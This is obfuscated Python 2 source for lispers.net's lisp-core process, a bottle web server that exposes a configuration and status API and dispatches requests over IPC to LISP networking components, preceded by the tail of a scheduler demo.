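    # then shut down via quit() and the shared stop event.
    def demo_task():
        print('demo task fired')

    stop_event = threading.Event()
    sched = Scheduler(parentstop=stop_event)
    sched.process(threaded=True)
    sched.add('demo', 0.5, demo_task, repeat=True)
    time.sleep(2)
    sched.quit()
    stop_event.set()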
|
lisp-core.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-core.py
#
# This is the core process that is used to demux to the specific LISP
# functional components. The 4342 listen socket is centralized here.
#
#
# +------------- data encapsulation via network --------------+
# | |
# | IPC when mr & ms colocated |
# | +--------------------------------+ |
# | | | |
# | | IPC when mr & ddt colo | |
# | | +------------+ | |
# | | | | | |
# | | | v v v 4341
# +-------------+ +----------+ +----------+ +----------+ +----------+
# | lisp-[ir]tr | | lisp-mr | | lisp-ddt | | lisp-ms | | lisp-etr |
# +-------------+ +----------+ +----------+ +----------+ +----------+
# ^ IPC ^ IPC ^ IPC ^ IPC ^ IPC
# | | | | |
# | | | | |
# | | | | |
# +--------------+--------------+--------------+--------------+
# |
# | for dispatching control messages
# +-----------+
# | lisp-core |
# +-----------+
# | 4342
# |
# via network
#
# -----------------------------------------------------------------------------
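# Illustrative sketch (an assumption, not lispers.net code): the demux role
# described in the diagram above amounts to a receive loop of roughly this
# shape, where a dispatch table maps the control-message type to the IPC
# socket of the owning component:
#
#     while True:
#         packet, source = lisp_socket_4342.recvfrom(9000)
#         component = dispatch_table[control_message_type(packet)]
#         component_ipc_socket.send(packet)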
if 64 - 64: i11iIiiIii
import lisp
import lispconfig
import multiprocessing
import threading
import commands
import time
import os
import bottle
import json
import sys
import socket
import thread
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
try :
from cherrypy . wsgiserver import CherryPyWSGIServer as wsgi_server
from cherrypy . wsgiserver . ssl_pyopenssl import pyOpenSSLAdapter as ssl_adaptor
except :
from cheroot . wsgi import Server as wsgi_server
from cheroot . ssl . builtin import BuiltinSSLAdapter as ssl_adaptor
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
if 30 - 30: o0oOOo0O0Ooo - O0 % o0oOOo0O0Ooo - OoooooooOO * O0 * OoooooooOO
if 60 - 60: iIii1I11I1II1 / i1IIi * oO0o - I1ii11iIi11i + o0oOOo0O0Ooo
if 94 - 94: i1IIi % Oo0Ooo
if 68 - 68: Ii1I / O0
if 46 - 46: O0 * II111iiii / IiII * Oo0Ooo * iII111i . I11i
Oo0oO0ooo = ""
if 56 - 56: I11i - i1IIi
o00oOoo = None
O0OOo = None
II1Iiii1111i = None
i1IIi11111i = [ None , None , None ]
o000o0o00o0Oo = None
if 80 - 80: OoooooooOO . I1IiiI
if 87 - 87: oO0o / ooOoO0o + I1Ii111 - ooOoO0o . ooOoO0o / II111iiii
if 11 - 11: I1IiiI % o0oOOo0O0Ooo - Oo0Ooo
if 58 - 58: i11iIiiIii % I1Ii111
if 54 - 54: OOooOOo % O0 + I1IiiI - iII111i / I11i
if 31 - 31: OoO0O00 + II111iiii
if 13 - 13: OOooOOo * oO0o * I1IiiI
if 55 - 55: II111iiii
@ bottle . route ( '/lisp/api' , method = "get" )
@ bottle . route ( '/lisp/api/<command>' , method = "get" )
@ bottle . route ( '/lisp/api/<command>/<data_structure>' , method = "get" )
def IIIiI11ii ( command = "" , data_structure = "" ) :
O000oo = [ { "?" : [ { "?" : "not-auth" } ] } ]
if 3 - 3: iII111i + O0
if 42 - 42: OOooOOo / i1IIi + i11iIiiIii - Ii1I
if 78 - 78: OoO0O00
if 18 - 18: O0 - iII111i / iII111i + ooOoO0o % ooOoO0o - IiII
if ( bottle . request . auth != None ) :
O0O00Ooo , OOoooooO = bottle . request . auth
if ( lispconfig . lisp_find_user_account ( O0O00Ooo , OOoooooO ) == False ) :
return ( json . dumps ( O000oo ) )
if 14 - 14: I11i % O0
else :
if ( bottle . request . headers [ "User-Agent" ] . find ( "python" ) != - 1 ) :
return ( json . dumps ( O000oo ) )
if 41 - 41: i1IIi + I1Ii111 + OOooOOo - IiII
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( json . dumps ( O000oo ) )
if 77 - 77: Oo0Ooo . IiII % ooOoO0o
if 42 - 42: oO0o - i1IIi / i11iIiiIii + OOooOOo + OoO0O00
if 17 - 17: oO0o . Oo0Ooo . I1ii11iIi11i
if 3 - 3: OoOoOO00 . Oo0Ooo . I1IiiI / Ii1I
if 38 - 38: II111iiii % i11iIiiIii . ooOoO0o - OOooOOo + Ii1I
if 66 - 66: OoooooooOO * OoooooooOO . OOooOOo . i1IIi - OOooOOo
if 77 - 77: I11i - iIii1I11I1II1
if ( command == "data" and data_structure != "" ) :
Ooo = bottle . request . body . readline ( )
O000oo = json . loads ( Ooo ) if Ooo != "" else ""
if ( O000oo != "" ) : O000oo = O000oo . values ( ) [ 0 ]
if ( O000oo == [ ] ) : O000oo = ""
if 68 - 68: I11i + OOooOOo . iIii1I11I1II1 - IiII % iIii1I11I1II1 - ooOoO0o
if ( type ( O000oo ) == dict and type ( O000oo . values ( ) [ 0 ] ) == dict ) :
O000oo = O000oo . values ( ) [ 0 ]
if 79 - 79: Oo0Ooo + I1IiiI - iII111i
if 83 - 83: ooOoO0o
O000oo = OO00o0OOO0 ( data_structure , O000oo )
return ( O000oo )
if 27 - 27: O0 % i1IIi * oO0o + i11iIiiIii + OoooooooOO * i1IIi
if 80 - 80: I11i * i11iIiiIii / I1Ii111
if 9 - 9: Ii1I + oO0o % Ii1I + i1IIi . OOooOOo
if 31 - 31: o0oOOo0O0Ooo + I11i + I11i / II111iiii
if 26 - 26: OoooooooOO
if ( command != "" ) :
command = "lisp " + command
else :
Ooo = bottle . request . body . readline ( )
if ( Ooo == "" ) :
O000oo = [ { "?" : [ { "?" : "no-body" } ] } ]
return ( json . dumps ( O000oo ) )
if 12 - 12: OoooooooOO % OoOoOO00 / ooOoO0o % o0oOOo0O0Ooo
if 29 - 29: OoooooooOO
O000oo = json . loads ( Ooo )
command = O000oo . keys ( ) [ 0 ]
if 23 - 23: o0oOOo0O0Ooo . II111iiii
if 98 - 98: iIii1I11I1II1 % OoOoOO00 * I1ii11iIi11i * OoOoOO00
O000oo = lispconfig . lisp_get_clause_for_api ( command )
return ( json . dumps ( O000oo ) )
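# Illustrative client usage for the GET route above (the endpoint shape and
# basic-auth requirement come from the handler; host, port, and credentials
# are hypothetical):
#
#     import requests
#     r = requests.get('https://localhost:8080/lisp/api/data/map-cache',
#                      auth=('admin', 'password'), verify=False)
#     print(r.json())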
if 45 - 45: I1Ii111 . OoOoOO00
if 83 - 83: oO0o . iIii1I11I1II1 . I1ii11iIi11i
if 31 - 31: Ii1I . Ii1I - o0oOOo0O0Ooo / OoO0O00 + ooOoO0o * I1IiiI
if 63 - 63: I1Ii111 % i1IIi / OoooooooOO - OoooooooOO
if 8 - 8: OoOoOO00
if 60 - 60: I11i / I11i
if 46 - 46: Ii1I * OOooOOo - OoO0O00 * oO0o - I1Ii111
def oo0 ( ) :
O000oo = { }
O000oo [ "hostname" ] = socket . gethostname ( )
O000oo [ "system-uptime" ] = commands . getoutput ( "uptime" )
O000oo [ "lisp-uptime" ] = lisp . lisp_print_elapsed ( lisp . lisp_uptime )
O000oo [ "lisp-version" ] = lisp . lisp_version
if 57 - 57: OOooOOo . OOooOOo
OooOooo = "yes" if os . path . exists ( "./logs/lisp-traceback.log" ) else "no"
O000oo [ "traceback-log" ] = OooOooo
if 97 - 97: ooOoO0o - OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - OoooooooOO
OoOo00o = lisp . lisp_myrlocs [ 0 ]
o0OOoo0OO0OOO = lisp . lisp_myrlocs [ 1 ]
OoOo00o = "none" if ( OoOo00o == None ) else OoOo00o . print_address_no_iid ( )
o0OOoo0OO0OOO = "none" if ( o0OOoo0OO0OOO == None ) else o0OOoo0OO0OOO . print_address_no_iid ( )
O000oo [ "lisp-rlocs" ] = [ OoOo00o , o0OOoo0OO0OOO ]
return ( json . dumps ( O000oo ) )
if 19 - 19: oO0o % i1IIi % o0oOOo0O0Ooo
if 93 - 93: iIii1I11I1II1 % oO0o * i1IIi
if 16 - 16: O0 - I1Ii111 * iIii1I11I1II1 + iII111i
if 50 - 50: II111iiii - ooOoO0o * I1ii11iIi11i / I1Ii111 + o0oOOo0O0Ooo
if 88 - 88: Ii1I / I1Ii111 + iII111i - II111iiii / ooOoO0o - OoOoOO00
if 15 - 15: I1ii11iIi11i + OoOoOO00 - OoooooooOO / OOooOOo
if 58 - 58: i11iIiiIii % I11i
if 71 - 71: OOooOOo + ooOoO0o % i11iIiiIii + I1ii11iIi11i - IiII
if 88 - 88: OoOoOO00 - OoO0O00 % OOooOOo
if 16 - 16: I1IiiI * oO0o % IiII
if 86 - 86: I1IiiI + Ii1I % i11iIiiIii * oO0o . ooOoO0o * I11i
if 44 - 44: oO0o
if 88 - 88: I1Ii111 % Ii1I . II111iiii
if 38 - 38: o0oOOo0O0Ooo
if 57 - 57: O0 / oO0o * I1Ii111 / OoOoOO00 . II111iiii
if 26 - 26: iII111i
if 91 - 91: OoO0O00 . I1ii11iIi11i + OoO0O00 - iII111i / OoooooooOO
def OO00o0OOO0 ( data_structure , data ) :
iII1 = [ "site-cache" , "map-cache" , "system" , "map-resolver" ,
"map-server" , "database-mapping" , "site-cache-summary" ]
if 30 - 30: II111iiii - OOooOOo - i11iIiiIii % OoOoOO00 - II111iiii * Ii1I
if ( data_structure not in iII1 ) : return ( json . dumps ( [ ] ) )
if 61 - 61: oO0o - I11i % OOooOOo
if 84 - 84: oO0o * OoO0O00 / I11i - O0
if 30 - 30: iIii1I11I1II1 / ooOoO0o - I1Ii111 - II111iiii % iII111i
if 49 - 49: I1IiiI % ooOoO0o . ooOoO0o . I11i * ooOoO0o
if ( data_structure == "system" ) : return ( oo0 ( ) )
if 97 - 97: Ii1I + o0oOOo0O0Ooo . OOooOOo + I1ii11iIi11i % iII111i
if 95 - 95: i1IIi
if 3 - 3: I1Ii111 - O0 / I1Ii111 % OoO0O00 / I1Ii111 . I1IiiI
if 50 - 50: IiII
if ( data != "" ) : data = json . dumps ( data )
i11I1iIiII = lisp . lisp_api_ipc ( "lisp-core" , data_structure + "%" + data )
if 96 - 96: Oo0Ooo
if ( data_structure in [ "map-cache" , "map-resolver" ] ) :
if ( lisp . lisp_is_running ( "lisp-rtr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( i11I1iIiII , O0OOo , "lisp-rtr" )
elif ( lisp . lisp_is_running ( "lisp-itr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( i11I1iIiII , O0OOo , "lisp-itr" )
else :
return ( json . dumps ( [ ] ) )
if 45 - 45: O0 * o0oOOo0O0Ooo % Oo0Ooo * OoooooooOO + iII111i . OoOoOO00
if 67 - 67: i11iIiiIii - i1IIi % I1ii11iIi11i . O0
if ( data_structure in [ "map-server" , "database-mapping" ] ) :
if ( lisp . lisp_is_running ( "lisp-etr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( i11I1iIiII , O0OOo , "lisp-etr" )
elif ( lisp . lisp_is_running ( "lisp-itr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( i11I1iIiII , O0OOo , "lisp-itr" )
else :
return ( json . dumps ( [ ] ) )
if 77 - 77: IiII / I1IiiI
if 15 - 15: IiII . iIii1I11I1II1 . OoooooooOO / i11iIiiIii - Ii1I . i1IIi
if ( data_structure in [ "site-cache" , "site-cache-summary" ] ) :
if ( lisp . lisp_is_running ( "lisp-ms" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( i11I1iIiII , O0OOo , "lisp-ms" )
else :
return ( json . dumps ( [ ] ) )
if 33 - 33: I11i . o0oOOo0O0Ooo
if 75 - 75: o0oOOo0O0Ooo % o0oOOo0O0Ooo . I1Ii111
if 5 - 5: o0oOOo0O0Ooo * ooOoO0o + OoOoOO00 . OOooOOo + OoOoOO00
lisp . lprint ( "Waiting for api get-data '{}', parmameters: '{}'" . format ( data_structure , data ) )
if 91 - 91: O0
if 61 - 61: II111iiii
O0OOO , II11iIiIIIiI , o0o , o00 = lisp . lisp_receive ( O0OOo , True )
lisp . lisp_ipc_lock . release ( )
return ( o00 )
if 56 - 56: I1IiiI - Oo0Ooo . Ii1I - IiII
if 73 - 73: Oo0Ooo - i1IIi - i1IIi - iII111i . Ii1I + I1ii11iIi11i
if 81 - 81: iII111i * oO0o - I1Ii111 . II111iiii % I11i / I1IiiI
if 34 - 34: IiII
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
if 6 - 6: oO0o
@ bottle . route ( '/lisp/api' , method = "put" )
@ bottle . route ( '/lisp/api/<command>' , method = "put" )
@ bottle . route ( '/lisp/api/<command>' , method = "delete" )
def oOOo0oOo0 ( command = "" ) :
O000oo = [ { "?" : [ { "?" : "not-auth" } ] } ]
if ( bottle . request . auth == None ) : return ( O000oo )
if 49 - 49: Oo0Ooo . i11iIiiIii - i1IIi / II111iiii . I1IiiI
if 1 - 1: Oo0Ooo / o0oOOo0O0Ooo % iII111i * IiII . i11iIiiIii
if 2 - 2: I1ii11iIi11i * I11i - iIii1I11I1II1 + I1IiiI . oO0o % iII111i
if 92 - 92: iII111i
if ( bottle . request . auth != None ) :
O0O00Ooo , OOoooooO = bottle . request . auth
if ( lispconfig . lisp_find_user_account ( O0O00Ooo , OOoooooO ) == False ) :
return ( json . dumps ( O000oo ) )
if 25 - 25: Oo0Ooo - I1IiiI / OoooooooOO / o0oOOo0O0Ooo
else :
if ( bottle . request . headers [ "User-Agent" ] . find ( "python" ) != - 1 ) :
return ( json . dumps ( O000oo ) )
if 12 - 12: I1IiiI * iII111i % i1IIi % iIii1I11I1II1
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( json . dumps ( O000oo ) )
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
if 51 - 51: O0 + iII111i
if 8 - 8: oO0o * OoOoOO00 - Ii1I - OoO0O00 * OOooOOo % I1IiiI
if 48 - 48: O0
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if ( command == "user-account" ) :
if ( lispconfig . lisp_is_user_superuser ( O0O00Ooo ) == False ) :
O000oo = [ { "user-account" : [ { "?" : "not-auth" } ] } ]
return ( json . dumps ( O000oo ) )
if 68 - 68: OOooOOo % I1Ii111
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
if 23 - 23: O0
if 85 - 85: Ii1I
Ooo = bottle . request . body . readline ( )
if ( Ooo == "" ) :
O000oo = [ { "?" : [ { "?" : "no-body" } ] } ]
return ( json . dumps ( O000oo ) )
if 84 - 84: I1IiiI . iIii1I11I1II1 % OoooooooOO + Ii1I % OoooooooOO % OoO0O00
if 42 - 42: OoO0O00 / I11i / o0oOOo0O0Ooo + iII111i / OoOoOO00
O000oo = json . loads ( Ooo )
if ( command != "" ) :
command = "lisp " + command
else :
command = O000oo [ 0 ] . keys ( ) [ 0 ]
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
if 53 - 53: iII111i % II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
if 77 - 77: iIii1I11I1II1 * OoO0O00
if 95 - 95: I1IiiI + i11iIiiIii
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if 80 - 80: II111iiii
lisp . lisp_ipc_lock . acquire ( )
if ( bottle . request . method == "DELETE" ) :
O000oo = lispconfig . lisp_remove_clause_for_api ( O000oo )
else :
O000oo = lispconfig . lisp_put_clause_for_api ( O000oo )
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
lisp . lisp_ipc_lock . release ( )
return ( json . dumps ( O000oo ) )
if 53 - 53: II111iiii
if 31 - 31: OoO0O00
if 80 - 80: I1Ii111 . i11iIiiIii - o0oOOo0O0Ooo
if 25 - 25: OoO0O00
if 62 - 62: OOooOOo + O0
@ bottle . route ( '/lisp/show/api-doc' , method = "get" )
def oO0OOOO0 ( ) :
if ( os . path . exists ( "lispapi.py" ) ) : os . system ( "pydoc lispapi > lispapi.txt" )
if ( os . path . exists ( "lispapi.txt" ) == False ) :
return ( "lispapi.txt file not found" )
if 26 - 26: Ii1I
return ( bottle . static_file ( "lispapi.txt" , root = "./" ) )
if 35 - 35: Ii1I - I1IiiI % o0oOOo0O0Ooo . OoooooooOO % Ii1I
if 47 - 47: iII111i - Ii1I . II111iiii + OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
if 87 - 87: Oo0Ooo . IiII
if 75 - 75: ooOoO0o + OoOoOO00 + o0oOOo0O0Ooo * I11i % oO0o . iII111i
@ bottle . route ( '/lisp/show/command-doc' , method = "get" )
def oO ( ) :
return ( bottle . static_file ( "lisp.config.example" , root = "./" ,
mimetype = "text/plain" ) )
if 31 - 31: OOooOOo + i11iIiiIii + Oo0Ooo * ooOoO0o
if 28 - 28: O0 * Oo0Ooo - OOooOOo % iIii1I11I1II1 * Ii1I - i11iIiiIii
if 7 - 7: Oo0Ooo + oO0o - I1Ii111 % Ii1I + I1ii11iIi11i
if 53 - 53: i1IIi - I11i . OoOoOO00
if 39 - 39: II111iiii / ooOoO0o + I1Ii111 / OoOoOO00
if 13 - 13: IiII + O0 + iII111i % I1IiiI / o0oOOo0O0Ooo . IiII
if 86 - 86: oO0o * o0oOOo0O0Ooo % i1IIi . Ii1I . i11iIiiIii
@ bottle . route ( '/lisp/show/lisp-xtr' , method = "get" )
def oOOoo00O00o ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 97 - 97: O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
if 63 - 63: OoOoOO00 * iII111i
if 69 - 69: O0 . OoO0O00
if ( os . path . exists ( "./show-ztr" ) ) :
ii1111iII = open ( "./show-ztr" , "r" ) ; iiiiI = ii1111iII . read ( ) ; ii1111iII . close ( )
else :
ii1111iII = open ( "./show-xtr" , "r" ) ; iiiiI = ii1111iII . read ( ) ; ii1111iII . close ( )
if 62 - 62: OoooooooOO * I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
i1 = ""
iiiiI = iiiiI . split ( "\n" )
for OOoO in iiiiI :
if ( OOoO [ 0 : 4 ] == " " ) : i1 += lisp . lisp_space ( 4 )
if ( OOoO [ 0 : 2 ] == " " ) : i1 += lisp . lisp_space ( 2 )
i1 += OOoO + "<br>"
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
i1 = lisp . convert_font ( i1 )
return ( lisp . lisp_print_sans ( i1 ) )
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
@ bottle . route ( '/lisp/show/<xtr>/keys' , method = "get" )
def OOoOO0o0o0 ( xtr ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 11 - 11: I1IiiI
I1111i = lispconfig . lisp_is_user_superuser ( None )
if 14 - 14: OOooOOo / o0oOOo0O0Ooo
if ( I1111i == False ) :
o00 = "Permission denied"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( o00 ) ) )
if 32 - 32: I1IiiI * Oo0Ooo
if 78 - 78: OOooOOo - OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii
if ( xtr not in [ "itr" , "etr" , "rtr" ] ) :
o00 = "Invalid URL"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( o00 ) ) )
if 29 - 29: I1IiiI % I1IiiI
Oo0O0 = "show {}-keys" . format ( xtr )
return ( lispconfig . lisp_process_show_command ( O0OOo , Oo0O0 ) )
if 82 - 82: II111iiii % I11i / OoO0O00 + OoOoOO00 / o0oOOo0O0Ooo / I1Ii111
if 70 - 70: oO0o
if 59 - 59: o0oOOo0O0Ooo % oO0o
if 6 - 6: iIii1I11I1II1 % i11iIiiIii % I1ii11iIi11i
if 93 - 93: IiII * OoooooooOO + ooOoO0o
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
if 11 - 11: ooOoO0o / OoOoOO00 - IiII * OoooooooOO + OoooooooOO . OoOoOO00
@ bottle . route ( '/lisp/geo-map/<geo_prefix>' )
def i1I1i111Ii ( geo_prefix ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 67 - 67: I1IiiI . i1IIi
if 27 - 27: ooOoO0o % I1IiiI
geo_prefix = geo_prefix . split ( "-" )
geo_prefix = "-" . join ( geo_prefix [ 0 : - 1 ] ) + "/" + geo_prefix [ - 1 ]
o0oooOO00 = lisp . lisp_geo ( "" )
o0oooOO00 . parse_geo_string ( geo_prefix )
iiIiii1IIIII , o00o = o0oooOO00 . dms_to_decimal ( )
II = o0oooOO00 . radius * 1000
if 7 - 7: I1ii11iIi11i - I1IiiI . iIii1I11I1II1 - i1IIi
o0OOOoO0 = open ( "./lispers.net-geo.html" , "r" ) ; o0OoOo00o0o = o0OOOoO0 . read ( ) ; o0OOOoO0 . close ( )
o0OoOo00o0o = o0OoOo00o0o . replace ( "$LAT" , str ( iiIiii1IIIII ) )
o0OoOo00o0o = o0OoOo00o0o . replace ( "$LON" , str ( o00o ) )
o0OoOo00o0o = o0OoOo00o0o . replace ( "$RADIUS" , str ( II ) )
return ( o0OoOo00o0o )
if 41 - 41: ooOoO0o % OoO0O00 - Oo0Ooo * I1Ii111 * Oo0Ooo
if 69 - 69: OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
if 23 - 23: i11iIiiIii
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
if 81 - 81: IiII % i1IIi . iIii1I11I1II1
if 4 - 4: i11iIiiIii % OoO0O00 % i1IIi / IiII
if 6 - 6: iII111i / I1IiiI % OOooOOo - I1IiiI
@ bottle . route ( '/lisp/login' , method = "get" )
def O0O00Oo ( ) :
return ( lispconfig . lisp_login_page ( ) )
if 31 - 31: OOooOOo
if 23 - 23: I1Ii111 . IiII
if 92 - 92: OoOoOO00 + I1Ii111 * Ii1I % I1IiiI
if 42 - 42: Oo0Ooo
if 76 - 76: I1IiiI * iII111i % I1Ii111
if 57 - 57: iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * OoooooooOO % II111iiii
if 68 - 68: OoooooooOO * I11i % OoOoOO00 - IiII
if 34 - 34: I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / I1Ii111 / I1ii11iIi11i
@ bottle . route ( '/lisp/login' , method = "post" )
def oOoOOo0O ( ) :
if ( lispconfig . lisp_validate_user ( ) ) :
return ( lispconfig . lisp_landing_page ( ) )
if 84 - 84: OoO0O00 + i1IIi - II111iiii . I1ii11iIi11i * OoooooooOO + I1IiiI
return ( O0O00Oo ( ) )
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
if 69 - 69: IiII - O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / OoO0O00
@ bottle . route ( '/lisp' )
def OoOoo00Ooo00 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 57 - 57: I1Ii111
return ( lispconfig . lisp_landing_page ( ) )
if 32 - 32: Ii1I - Oo0Ooo % OoooooooOO . iII111i / IiII + I1IiiI
if 76 - 76: ooOoO0o
if 73 - 73: O0 * iII111i + Ii1I + ooOoO0o
if 40 - 40: II111iiii . OoOoOO00 * I1Ii111 + OOooOOo + OOooOOo
if 9 - 9: I11i % OoooooooOO . oO0o % I11i
if 32 - 32: i11iIiiIii
if 31 - 31: iIii1I11I1II1 / OoO0O00 / I1ii11iIi11i
@ bottle . route ( '/lisp/traceback' )
def iiIiIi ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 39 - 39: I1Ii111
if 91 - 91: OoooooooOO - iIii1I11I1II1 + OoOoOO00 / OoO0O00 . OoOoOO00 + O0
iIiii1iI1 = True
if 33 - 33: IiII % iIii1I11I1II1 * I1IiiI
if 95 - 95: ooOoO0o / ooOoO0o
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
if 55 - 55: ooOoO0o - I11i + II111iiii + iII111i % Ii1I
if ( os . path . exists ( "./logs/lisp-traceback.log" ) ) :
o00 = commands . getoutput ( "cat ./logs/lisp-traceback.log" )
if ( o00 ) :
o00 = o00 . replace ( "----------" , "<b>----------</b>" )
o00 = o00 . replace ( "\n" , "<br>" )
iIiii1iI1 = False
if 41 - 41: i1IIi - I11i - Ii1I
if 8 - 8: OoO0O00 + I1Ii111 - o0oOOo0O0Ooo % Oo0Ooo % o0oOOo0O0Ooo * oO0o
if 9 - 9: Oo0Ooo - i11iIiiIii - OOooOOo * Ii1I + ooOoO0o
if 44 - 44: II111iiii
if 52 - 52: I1ii11iIi11i - Oo0Ooo + I1ii11iIi11i % o0oOOo0O0Ooo
if 35 - 35: iIii1I11I1II1
if ( iIiii1iI1 ) :
o00 = ""
I1i = "egrep --with-filename Traceback ./logs/*.log"
iIII = commands . getoutput ( I1i )
iIII = iIII . split ( "\n" )
for o0o0O in iIII :
if ( o0o0O . find ( ":" ) == - 1 ) : continue
OOoO = o0o0O . split ( ":" )
if ( OOoO [ 1 ] == "0" ) : continue
o00 += "Found Tracebacks in log file {}<br>" . format ( OOoO [ 0 ] )
iIiii1iI1 = False
if 68 - 68: ooOoO0o
o00 = o00 [ 0 : - 4 ]
if 25 - 25: I1ii11iIi11i . ooOoO0o
if 24 - 24: oO0o / i11iIiiIii + oO0o
if ( iIiii1iI1 ) :
o00 = "No Tracebacks found - a stable system is a happy system"
if 20 - 20: I11i + Ii1I / O0 % iIii1I11I1II1
if 88 - 88: OoOoOO00 / II111iiii
o00 = lisp . lisp_print_cour ( o00 )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 87 - 87: I1ii11iIi11i - I1ii11iIi11i - iII111i + oO0o
if 82 - 82: oO0o / iIii1I11I1II1 . I1IiiI . OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
@ bottle . route ( '/lisp/show/not-supported' )
def oOoO0 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 77 - 77: iIii1I11I1II1 . iII111i % iII111i + i11iIiiIii
return ( lispconfig . lisp_not_supported ( ) )
if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
if 17 - 17: i1IIi
if 21 - 21: Oo0Ooo
if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
@ bottle . route ( '/lisp/show/status' )
def I1ii11 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 74 - 74: Oo0Ooo - o0oOOo0O0Ooo . i1IIi
if 43 - 43: iII111i / I1IiiI
